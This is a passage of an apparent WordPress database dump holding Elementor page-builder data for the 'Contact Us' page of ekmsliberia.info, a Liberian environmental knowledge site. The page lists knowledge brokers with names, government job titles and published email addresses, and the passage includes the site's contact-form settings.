88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"John K. Jallah\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_KT.jpg\",\"id\":2360},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"Kawusu Toure\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6b5064d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0ffa3a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr<\\/strong>\\n\\nCoordinator Climate Change Secretariat, EPA\\n\\n<a href=\\\"mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5d6e5e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c31131b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong><br>\\n\\nEIA Manager, FDA<br>\\n\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b2d79ff\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f970049\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"239344d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"6ab7cf6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"310af85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"8523c31\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(19722,80,'_g_feedback_shortcode_3e1ee2b4126421067bbc9d221bf21e09b1318699','</p><p>[contact-field required=\"1\" type=\"name\" label=\"Name\"/]</p><p>[contact-field required=\"1\" type=\"email\" label=\"Email\"/]</p><p>[contact-field required=\"1\" options=\"Documents (Policies Reports Case Studies Guides etc),Biodiversity,Climate Change,Desertification,News or Blogs,General Inquiry\" type=\"select\" label=\"Select one\"/]</p><p>[contact-field type=\"textarea\" label=\"Message\"/]'),(19723,80,'_g_feedback_shortcode_atts_3e1ee2b4126421067bbc9d221bf21e09b1318699','a:9:{s:2:\"to\";s:24:\"contact@ekmsliberia.info\";s:7:\"subject\";s:20:\"Contact Form message\";s:12:\"show_subject\";s:2:\"no\";s:6:\"widget\";i:0;s:2:\"id\";i:80;s:18:\"submit_button_text\";s:6:\"Submit\";s:14:\"customThankyou\";s:7:\"message\";s:21:\"customThankyouMessage\";s:30:\"Thank you for your submission!\";s:22:\"customThankyouRedirect\";s:0:\"\";}'),(19724,2883,'_elementor_edit_mode','builder'),(19725,2883,'_elementor_template_type','wp-page'),(19726,2883,'_elementor_version','2.7.5'),(19727,2883,'_wp_page_template','default'),(19728,2883,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d8b2d45\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\",\"id\":2315},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"J.S. Datuama Cammue\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"caption\":\"Benjamin Karmorh\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BJ-1.jpg\",\"id\":2357},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"Berexford S. Jallah\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"John K. Jallah\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_KT.jpg\",\"id\":2360},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"Kawusu Toure\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6b5064d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0ffa3a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr<\\/strong>\\n\\nCoordinator Climate Change Secretariat, EPA\\n\\n<a 